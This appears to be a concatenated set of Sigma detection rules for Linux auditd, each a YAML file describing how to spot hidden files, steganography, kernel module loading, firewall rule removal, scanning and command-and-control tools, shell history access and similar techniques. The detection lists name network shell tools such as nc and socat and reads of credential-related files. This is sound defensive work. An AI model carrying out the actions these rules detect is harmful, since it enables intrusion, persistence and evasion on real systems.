related: 4 | - id: d08722cd-3d09-449a-80b4-83ea2d9d4616 5 | type: similar 6 | status: test 7 | description: Detects calls to hidden files or files located in hidden directories in NIX systems. 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md 10 | author: David Burkett, @signalblur 11 | date: 2022/12/30 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1574.001 15 | logsource: 16 | product: linux 17 | service: auditd 18 | detection: 19 | selection: 20 | type: 'PATH' 21 | name|contains: '/.' 
22 | filter: 23 | name|contains: 24 | - '/.cache/' 25 | - '/.config/' 26 | - '/.pyenv/' 27 | - '/.rustup/toolchains' 28 | condition: selection and not filter 29 | falsepositives: 30 | - Unknown 31 | level: low 32 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_hidden_files_directories.yml: -------------------------------------------------------------------------------- 1 | title: Hidden Files and Directories 2 | id: d08722cd-3d09-449a-80b4-83ea2d9d4616 3 | status: test 4 | description: Detects an adversary creating a hidden file or directory, by detecting directories or files with . as the first character 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md 7 | author: 'Pawel Mazur' 8 | date: 2021/09/06 9 | modified: 2022/10/09 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1564.001 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | commands: 18 | type: EXECVE 19 | a0: 20 | - mkdir 21 | - touch 22 | - vim 23 | - nano 24 | - vi 25 | arguments: 26 | - a1|contains: '/.' 27 | - a1|startswith: '.' 28 | - a2|contains: '/.' 29 | - a2|startswith: '.' 
30 | condition: commands and arguments 31 | falsepositives: 32 | - Unknown 33 | level: low 34 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml: -------------------------------------------------------------------------------- 1 | title: Steganography Hide Zip Information in Picture File 2 | id: 45810b50-7edc-42ca-813b-bdac02fb946b 3 | status: test 4 | description: Detects appending of zip file to image 5 | references: 6 | - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ 7 | author: 'Pawel Mazur' 8 | date: 2021/09/09 9 | modified: 2022/10/09 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1027.003 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | commands: 18 | type: EXECVE 19 | a0: cat 20 | a1: 21 | a1|endswith: 22 | - '.jpg' 23 | - '.png' 24 | a2: 25 | a2|endswith: '.zip' 26 | condition: commands and a1 and a2 27 | falsepositives: 28 | - Unknown 29 | level: low 30 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml: -------------------------------------------------------------------------------- 1 | title: Linux Keylogging with Pam.d 2 | id: 49aae26c-450e-448b-911d-b3c13d178dfc 3 | status: test 4 | description: Detect attempt to enable auditing of TTY input 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md 7 | - https://linux.die.net/man/8/pam_tty_audit 8 | - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing 9 | - https://access.redhat.com/articles/4409591#audit-record-types-2 10 | author: 'Pawel Mazur' 11 | date: 2021/05/24 12 | modified: 2022/12/18 13 | tags: 14 | - attack.credential_access 15 | - attack.t1003 16 | - attack.t1056.001 17 | logsource: 18 | 
product: linux 19 | service: auditd 20 | detection: 21 | selection_path_events: 22 | type: PATH 23 | name: 24 | - '/etc/pam.d/system-auth' 25 | - '/etc/pam.d/password-auth' 26 | selection_tty_events: 27 | type: 28 | - 'TTY' 29 | - 'USER_TTY' 30 | condition: 1 of selection_* 31 | falsepositives: 32 | - Administrative work 33 | level: high 34 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml: -------------------------------------------------------------------------------- 1 | title: Modification of ld.so.preload 2 | id: 4b3cb710-5e83-4715-8c45-8b2b5b3e5751 3 | status: test 4 | description: Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md 7 | - https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html 8 | author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community 9 | date: 2019/10/24 10 | modified: 2021/11/27 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1574.006 14 | logsource: 15 | product: linux 16 | service: auditd 17 | detection: 18 | selection: 19 | type: 'PATH' 20 | name: '/etc/ld.so.preload' 21 | condition: selection 22 | falsepositives: 23 | - Unknown 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_load_module_insmod.yml: -------------------------------------------------------------------------------- 1 | title: Loading of Kernel Module via Insmod 2 | id: 106d7cbd-80ff-4985-b682-a7043e5acb72 3 | status: test 4 | description: | 5 | Detects loading of kernel modules with insmod command. 
6 | Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. 7 | Adversaries may use LKMs to obtain persistence within the system or elevate the privileges. 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md 10 | - https://linux.die.net/man/8/insmod 11 | - https://man7.org/linux/man-pages/man8/kmod.8.html 12 | author: 'Pawel Mazur' 13 | date: 2021/11/02 14 | modified: 2022/12/25 15 | tags: 16 | - attack.persistence 17 | - attack.privilege_escalation 18 | - attack.t1547.006 19 | logsource: 20 | product: linux 21 | service: auditd 22 | detection: 23 | selection: 24 | type: 'SYSCALL' 25 | comm: insmod 26 | exe: /usr/bin/kmod 27 | condition: selection 28 | falsepositives: 29 | - Unknown 30 | level: high 31 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_logging_config_change.yml: -------------------------------------------------------------------------------- 1 | title: Logging Configuration Changes on Linux Host 2 | id: c830f15d-6f6e-430f-8074-6f73d6807841 3 | status: test 4 | description: Detect changes of syslog daemons configuration files 5 | references: 6 | - self experience 7 | author: Mikhail Larin, oscd.community 8 | date: 2019/10/25 9 | modified: 2021/11/27 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1562.006 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'PATH' 19 | name: 20 | - /etc/syslog.conf 21 | - /etc/rsyslog.conf 22 | - /etc/syslog-ng/syslog-ng.conf 23 | condition: selection 24 | fields: 25 | - exe 26 | - comm 27 | - key 28 | falsepositives: 29 | - Legitimate administrative activity 30 | level: high 31 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_masquerading_crond.yml: 
-------------------------------------------------------------------------------- 1 | title: Masquerading as Linux Crond Process 2 | id: 9d4548fa-bba0-4e88-bd66-5d5bf516cda0 3 | status: test 4 | description: | 5 | Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. 6 | Several different variations of this technique have been observed. 7 | references: 8 | - https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process 9 | author: Timur Zinniatullin, oscd.community 10 | date: 2019/10/21 11 | modified: 2023/08/22 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1036.003 15 | logsource: 16 | product: linux 17 | service: auditd 18 | detection: 19 | selection: 20 | type: 'execve' 21 | a0: 'cp' 22 | a1: '/bin/sh' 23 | a2|endswith: '/crond' 24 | condition: selection 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_modify_system_firewall.yml: -------------------------------------------------------------------------------- 1 | title: Modify System Firewall 2 | id: 323ff3f5-0013-4847-bbd4-250b5edb62cc 3 | related: 4 | - id: 53059bc0-1472-438b-956a-7508a94a91f0 5 | type: similar 6 | status: experimental 7 | description: | 8 | Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. 9 | Detection rules that match only on the disabling of firewalls will miss this. 
10 | references: 11 | - https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html 12 | - https://blog.aquasec.com/container-security-tnt-container-attack 13 | author: IAI 14 | date: 2023/03/06 15 | tags: 16 | - attack.t1562.004 17 | - attack.defense_evasion 18 | logsource: 19 | product: linux 20 | service: auditd 21 | detection: 22 | selection1: 23 | type: 'EXECVE' 24 | a0: 'iptables' 25 | a1|contains: 'DROP' 26 | selection2: 27 | type: 'EXECVE' 28 | a0: 'firewall-cmd' 29 | a1|contains: 'remove' 30 | selection3: 31 | type: 'EXECVE' 32 | a0: 'ufw' 33 | a1|contains: 'delete' 34 | condition: 1 of selection* 35 | falsepositives: 36 | - Legitimate admin activity 37 | level: medium 38 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_network_service_scanning.yml: -------------------------------------------------------------------------------- 1 | title: Linux Network Service Scanning - Auditd 2 | id: 3761e026-f259-44e6-8826-719ed8079408 3 | related: 4 | - id: 3e102cd9-a70d-4a7a-9508-403963092f31 5 | type: derived 6 | status: test 7 | description: Detects enumeration of local or remote network services. 
8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md 10 | author: Alejandro Ortuno, oscd.community 11 | date: 2020/10/21 12 | modified: 2023/09/26 13 | tags: 14 | - attack.discovery 15 | - attack.t1046 16 | logsource: 17 | product: linux 18 | service: auditd 19 | definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/e181243a7c708e9d579557d6f80e0ed3d3483b89/audit.rules#L182-L183' 20 | detection: 21 | selection: 22 | type: 'SYSCALL' 23 | exe|endswith: 24 | - '/telnet' 25 | - '/nmap' 26 | - '/netcat' 27 | - '/nc' 28 | - '/ncat' 29 | - '/nc.openbsd' 30 | key: 'network_connect_4' 31 | condition: selection 32 | falsepositives: 33 | - Legitimate administration activities 34 | level: low 35 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_network_sniffing.yml: -------------------------------------------------------------------------------- 1 | title: Network Sniffing - Linux 2 | id: f4d3748a-65d1-4806-bd23-e25728081d01 3 | status: test 4 | description: | 5 | Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. 6 | An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. 
7 | references: 8 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md 9 | author: Timur Zinniatullin, oscd.community 10 | date: 2019/10/21 11 | modified: 2022/12/18 12 | tags: 13 | - attack.credential_access 14 | - attack.discovery 15 | - attack.t1040 16 | logsource: 17 | product: linux 18 | service: auditd 19 | detection: 20 | selection_1: 21 | type: 'execve' 22 | a0: 'tcpdump' 23 | a1: '-c' 24 | a3|contains: '-i' 25 | selection_2: 26 | type: 'execve' 27 | a0: 'tshark' 28 | a1: '-c' 29 | a3: '-i' 30 | condition: 1 of selection_* 31 | falsepositives: 32 | - Legitimate administrator or user uses network sniffing tool for legitimate reasons. 33 | level: low 34 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml: -------------------------------------------------------------------------------- 1 | title: OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd 2 | id: 045b5f9c-49f7-4419-a236-9854fb3c827a 3 | status: test 4 | description: | 5 | Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. 6 | SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. 7 | Microsoft Azure, and Microsoft Operations Management Suite. 
8 | references: 9 | - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure 10 | - https://github.com/Azure/Azure-Sentinel/pull/3059 11 | author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) 12 | date: 2021/09/17 13 | modified: 2022/11/26 14 | tags: 15 | - attack.privilege_escalation 16 | - attack.initial_access 17 | - attack.execution 18 | - attack.t1068 19 | - attack.t1190 20 | - attack.t1203 21 | logsource: 22 | product: linux 23 | service: auditd 24 | detection: 25 | selection: 26 | type: 'SYSCALL' 27 | syscall: 'execve' 28 | uid: 0 29 | cwd: '/var/opt/microsoft/scx/tmp' 30 | comm: 'sh' 31 | condition: selection 32 | falsepositives: 33 | - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. 34 | level: high 35 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_password_policy_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Password Policy Discovery 2 | id: ca94a6db-8106-4737-9ed2-3e3bb826af0a 3 | status: stable 4 | description: Detects password policy discovery commands 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md 7 | - https://linux.die.net/man/1/chage 8 | - https://man7.org/linux/man-pages/man1/passwd.1.html 9 | - https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu 10 | author: Ömer Günal, oscd.community, Pawel Mazur 11 | date: 2020/10/08 12 | modified: 2022/12/18 13 | tags: 14 | - attack.discovery 15 | - attack.t1201 16 | logsource: 17 | product: linux 18 | service: auditd 19 | detection: 20 | selection_files: 21 | type: 'PATH' 22 | name: 23 | - '/etc/pam.d/common-password' 24 | - '/etc/security/pwquality.conf' 25 | - '/etc/pam.d/system-auth' 26 | - '/etc/login.defs' 27 | selection_chage: 28 | type: 'EXECVE' 29 | a0: 'chage' 30 | a1: 31 | - '--list' 32 | - 
'-l' 33 | selection_passwd: 34 | type: 'EXECVE' 35 | a0: 'passwd' 36 | a1: 37 | - '-S' 38 | - '--status' 39 | condition: 1 of selection_* 40 | falsepositives: 41 | - Legitimate administration activities 42 | level: low 43 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml: -------------------------------------------------------------------------------- 1 | title: Systemd Service Reload or Start 2 | id: 2625cc59-0634-40d0-821e-cb67382a3dd7 3 | status: test 4 | description: Detects a reload or a start of a service. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md 7 | author: Jakob Weinzettl, oscd.community 8 | date: 2019/09/23 9 | modified: 2021/11/27 10 | tags: 11 | - attack.persistence 12 | - attack.t1543.002 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'EXECVE' 19 | a0|contains: 'systemctl' 20 | a1|contains: 21 | - 'daemon-reload' 22 | - 'start' 23 | condition: selection 24 | falsepositives: 25 | - Installation of legitimate service. 26 | - Legitimate reconfiguration of service. 27 | level: low 28 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_screencapture_import.yml: -------------------------------------------------------------------------------- 1 | title: Screen Capture with Import Tool 2 | id: dbe4b9c5-c254-4258-9688-d6af0b7967fd 3 | status: test 4 | description: | 5 | Detects adversary creating screen capture of a desktop with Import Tool. 6 | Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. 7 | ImageMagick must be installed. 
8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md 10 | - https://linux.die.net/man/1/import 11 | - https://imagemagick.org/ 12 | author: 'Pawel Mazur' 13 | date: 2021/09/21 14 | modified: 2022/10/09 15 | tags: 16 | - attack.collection 17 | - attack.t1113 18 | logsource: 19 | product: linux 20 | service: auditd 21 | detection: 22 | import: 23 | type: EXECVE 24 | a0: import 25 | import_window_root: 26 | a1: '-window' 27 | a2: 'root' 28 | a3|endswith: 29 | - '.png' 30 | - '.jpg' 31 | - '.jpeg' 32 | import_no_window_root: 33 | a1|endswith: 34 | - '.png' 35 | - '.jpg' 36 | - '.jpeg' 37 | condition: import and (import_window_root or import_no_window_root) 38 | falsepositives: 39 | - Legitimate use of screenshot utility 40 | level: low 41 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml: -------------------------------------------------------------------------------- 1 | title: Screen Capture with Xwd 2 | id: e2f17c5d-b02a-442b-9052-6eb89c9fec9c 3 | status: test 4 | description: Detects adversary creating screen capture of a full with xwd. 
Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture 7 | - https://linux.die.net/man/1/xwd 8 | author: 'Pawel Mazur' 9 | date: 2021/09/13 10 | modified: 2022/12/18 11 | tags: 12 | - attack.collection 13 | - attack.t1113 14 | logsource: 15 | product: linux 16 | service: auditd 17 | detection: 18 | selection: 19 | type: EXECVE 20 | a0: xwd 21 | xwd_root_window: 22 | a1: '-root' 23 | a2: '-out' 24 | a3|endswith: '.xwd' 25 | xwd_no_root_window: 26 | a1: '-out' 27 | a2|endswith: '.xwd' 28 | condition: selection and 1 of xwd_* 29 | falsepositives: 30 | - Legitimate use of screenshot utility 31 | level: low 32 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml: -------------------------------------------------------------------------------- 1 | title: Split A File Into Pieces - Linux 2 | id: 2dad0cba-c62a-4a4f-949f-5f6ecd619769 3 | status: test 4 | description: 'Detection use of the command "split" to split files into parts and possible transfer.' 
5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md 7 | author: 'Igor Fits, oscd.community' 8 | date: 2020/10/15 9 | modified: 2022/11/28 10 | tags: 11 | - attack.exfiltration 12 | - attack.t1030 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'SYSCALL' 19 | comm: 'split' 20 | condition: selection 21 | falsepositives: 22 | - Legitimate administrative activity 23 | level: low 24 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml: -------------------------------------------------------------------------------- 1 | title: Steganography Hide Files with Steghide 2 | id: ce446a9e-30b9-4483-8e38-d2c9ad0a2280 3 | status: test 4 | description: Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. 
5 | references: 6 | - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ 7 | author: 'Pawel Mazur' 8 | date: 2021/09/11 9 | modified: 2022/10/09 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1027.003 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: EXECVE 19 | a0: steghide 20 | a1: embed 21 | a2: 22 | - '-cf' 23 | - '-ef' 24 | a4: 25 | - '-cf' 26 | - '-ef' 27 | condition: selection 28 | falsepositives: 29 | - Unknown 30 | level: low 31 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml: -------------------------------------------------------------------------------- 1 | title: Steganography Extract Files with Steghide 2 | id: a5a827d9-1bbe-4952-9293-c59d897eb41b 3 | status: test 4 | description: Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. 
5 | references: 6 | - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ 7 | author: 'Pawel Mazur' 8 | date: 2021/09/11 9 | modified: 2022/10/09 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1027.003 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: EXECVE 19 | a0: steghide 20 | a1: extract 21 | a2: '-sf' 22 | a3|endswith: 23 | - '.jpg' 24 | - '.png' 25 | condition: selection 26 | falsepositives: 27 | - Unknown 28 | level: low 29 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_susp_c2_commands.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious C2 Activities 2 | id: f7158a64-6204-4d6d-868a-6e6378b467e0 3 | status: test 4 | description: | 5 | Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. 6 | This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. 
7 | These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) 8 | references: 9 | - https://github.com/Neo23x0/auditd 10 | author: Marie Euler 11 | date: 2020/05/18 12 | modified: 2021/11/27 13 | tags: 14 | - attack.command_and_control 15 | logsource: 16 | product: linux 17 | service: auditd 18 | detection: 19 | selection: 20 | key: 'susp_activity' 21 | condition: selection 22 | falsepositives: 23 | - Admin or User activity 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_susp_cmds.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Commands Linux 2 | id: 1543ae20-cbdf-4ec1-8d12-7664d667a825 3 | status: test 4 | description: Detects relevant commands often related to malware or hacking activity 5 | references: 6 | - Internal Research - mostly derived from exploit code including code in MSF 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/12/12 9 | modified: 2022/10/05 10 | tags: 11 | - attack.execution 12 | - attack.t1059.004 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | cmd1: 18 | type: 'EXECVE' 19 | a0: 'chmod' 20 | a1: 777 21 | cmd2: 22 | type: 'EXECVE' 23 | a0: 'chmod' 24 | a1: 'u+s' 25 | cmd3: 26 | type: 'EXECVE' 27 | a0: 'cp' 28 | a1: '/bin/ksh' 29 | cmd4: 30 | type: 'EXECVE' 31 | a0: 'cp' 32 | a1: '/bin/sh' 33 | condition: 1 of cmd* 34 | falsepositives: 35 | - Admin activity 36 | level: medium 37 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_susp_exe_folders.yml: -------------------------------------------------------------------------------- 1 | title: Program Executions in Suspicious Folders 2 | id: a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc 3 | status: test 
4 | description: Detects program executions in suspicious non-program folders related to malware or hacking activity 5 | references: 6 | - Internal Research 7 | author: Florian Roth (Nextron Systems) 8 | date: 2018/01/23 9 | modified: 2021/11/27 10 | tags: 11 | - attack.t1587 12 | - attack.t1584 13 | - attack.resource_development 14 | logsource: 15 | product: linux 16 | service: auditd 17 | detection: 18 | selection: 19 | type: 'SYSCALL' 20 | exe|startswith: 21 | # Temporary folder 22 | - '/tmp/' 23 | # Web server 24 | - '/var/www/' # Standard 25 | - '/home/*/public_html/' # Per-user 26 | - '/usr/local/apache2/' # Classical Apache 27 | - '/usr/local/httpd/' # Old SuSE Linux 6.* Apache 28 | - '/var/apache/' # Solaris Apache 29 | - '/srv/www/' # SuSE Linux 9.* 30 | - '/home/httpd/html/' # Redhat 6 or older Apache 31 | - '/srv/http/' # ArchLinux standard 32 | - '/usr/share/nginx/html/' # ArchLinux nginx 33 | # Data dirs of typically exploited services (incomplete list) 34 | - '/var/lib/pgsql/data/' 35 | - '/usr/local/mysql/data/' 36 | - '/var/lib/mysql/' 37 | - '/var/vsftpd/' 38 | - '/etc/bind/' 39 | - '/var/named/' 40 | condition: selection 41 | falsepositives: 42 | - Admin activity (especially in /tmp folders) 43 | - Crazy web applications 44 | level: medium 45 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious History File Operations - Linux 2 | id: eae8ce9f-bde9-47a6-8e79-f20d18419910 3 | status: test 4 | description: 'Detects commandline operations on shell history files' 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md 7 | author: 'Mikhail Larin, oscd.community' 8 | date: 2020/10/17 9 | modified: 2022/11/28 10 | tags: 11 | - attack.credential_access 12 | - attack.t1552.003 
13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | execve: 18 | type: EXECVE 19 | history: 20 | - '.bash_history' 21 | - '.zsh_history' 22 | - '.zhistory' 23 | - '.history' 24 | - '.sh_history' 25 | - 'fish_history' 26 | condition: execve and history 27 | fields: 28 | - a0 29 | - a1 30 | - a2 31 | - a3 32 | - key 33 | falsepositives: 34 | - Legitimate administrative activity 35 | - Legitimate software, cleaning hist file 36 | level: medium 37 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_system_info_discovery.yml: -------------------------------------------------------------------------------- 1 | title: System Information Discovery - Auditd 2 | id: f34047d9-20d3-4e8b-8672-0a35cc50dc71 3 | status: test 4 | description: Detects System Information Discovery commands 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md 7 | author: Pawel Mazur 8 | date: 2021/09/03 9 | modified: 2023/03/06 10 | tags: 11 | - attack.discovery 12 | - attack.t1082 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection_1: 18 | type: PATH 19 | name: 20 | - /etc/lsb-release 21 | - /etc/redhat-release 22 | - /etc/issue 23 | selection_2: 24 | type: EXECVE 25 | a0: 26 | - uname 27 | - uptime 28 | - lsmod 29 | - hostname 30 | - env 31 | selection_3: 32 | type: EXECVE 33 | a0: grep 34 | a1|contains: 35 | - vbox 36 | - vm 37 | - xen 38 | - virtio 39 | - hv 40 | selection_4: 41 | type: EXECVE 42 | a0: kmod 43 | a1: list 44 | condition: 1 of selection_* 45 | falsepositives: 46 | - Likely 47 | level: low 48 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_system_info_discovery2.yml: -------------------------------------------------------------------------------- 1 | title: System and Hardware Information Discovery 2 | id: 
1f358e2e-cb63-43c3-b575-dfb072a6814f 3 | related: 4 | - id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 5 | type: derived 6 | status: stable 7 | description: Detects system information discovery commands 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware 10 | author: Ömer Günal, oscd.community 11 | date: 2020/10/08 12 | modified: 2022/11/26 13 | tags: 14 | - attack.discovery 15 | - attack.t1082 16 | logsource: 17 | product: linux 18 | service: auditd 19 | detection: 20 | selection: 21 | type: 'PATH' 22 | name: 23 | - '/sys/class/dmi/id/bios_version' 24 | - '/sys/class/dmi/id/product_name' 25 | - '/sys/class/dmi/id/chassis_vendor' 26 | - '/proc/scsi/scsi' 27 | - '/proc/ide/hd0/model' 28 | - '/proc/version' 29 | - '/etc/*version' 30 | - '/etc/*release' 31 | - '/etc/issue' 32 | condition: selection 33 | falsepositives: 34 | - Legitimate administration activities 35 | level: informational 36 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml: -------------------------------------------------------------------------------- 1 | title: System Shutdown/Reboot - Linux 2 | id: 4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f 3 | status: test 4 | description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. 
5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md 7 | author: 'Igor Fits, oscd.community' 8 | date: 2020/10/15 9 | modified: 2022/11/26 10 | tags: 11 | - attack.impact 12 | - attack.t1529 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | execve: 18 | type: 'EXECVE' 19 | shutdowncmd: 20 | - 'shutdown' 21 | - 'reboot' 22 | - 'halt' 23 | - 'poweroff' 24 | init: 25 | - 'init' 26 | - 'telinit' 27 | initselection: 28 | - 0 29 | - 6 30 | condition: execve and (shutdowncmd or (init and initselection)) 31 | falsepositives: 32 | - Legitimate administrative activity 33 | level: informational 34 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_systemd_service_creation.yml: -------------------------------------------------------------------------------- 1 | title: Systemd Service Creation 2 | id: 1bac86ba-41aa-4f62-9d6b-405eac99b485 3 | status: test 4 | description: Detects a creation of systemd services which could be used by adversaries to execute malicious code. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md 7 | author: 'Pawel Mazur' 8 | date: 2022/02/03 9 | modified: 2022/02/06 10 | tags: 11 | - attack.persistence 12 | - attack.t1543.002 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | path: 18 | type: 'PATH' 19 | nametype: 'CREATE' 20 | name_1: 21 | name|startswith: 22 | - '/usr/lib/systemd/system/' 23 | - '/etc/systemd/system/' 24 | name_2: 25 | name|contains: '/.config/systemd/user/' 26 | condition: path and 1 of name_* 27 | falsepositives: 28 | - Admin work like legit service installs. 
